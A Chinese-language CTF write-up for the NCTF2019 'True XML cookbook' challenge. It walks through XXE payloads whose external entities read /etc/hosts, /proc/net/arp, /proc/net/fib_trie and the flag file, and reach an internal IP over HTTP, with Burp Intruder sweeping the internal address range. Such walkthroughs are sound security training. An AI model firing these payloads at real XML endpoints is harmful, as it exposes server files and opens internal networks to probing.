BUU [NCTF2019]True XML cookbook

打开连接

 熟悉的界面,我们就不做黑盒测试了,直接抓包修改xml

payload:<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
<user><username>&admin;</username><password>123456</password></user>

 测试直接读取flag失败,试试内网探测看是否有结果

内网探测命令

/etc/hosts
/proc/net/arp
/proc/net/tcp
/proc/net/udp
/proc/net/dev
/proc/net/fib_trie
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///etc/hosts">
  ]>
<user><username>&admin;</username><password>123456</password></user>

 

 并未发现任何主机,尝试其他命令

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///proc/net/arp">
  ]>
<user><username>&admin;</username><password>123456</password></user>

 这里扫出了两个主机,尝试访问

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "http://10.128.253.12 ">
  ]>
<user><username>&admin;</username><password>123456</password></user>

 失败

用BP的intruder模块来爆破ip1-100

 add这里

 设置数字字典从1到100

 线程可以调高点

这里我把两个ip都爆破了一次,都没发现flag

尝试其他命令进行探测最后用此命令扫出了正确的ip

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///proc/net/fib_trie">
  ]>
<user><username>&admin;</username><password>123456</password></user>

 爆破得到flag

芜湖

  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 4
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值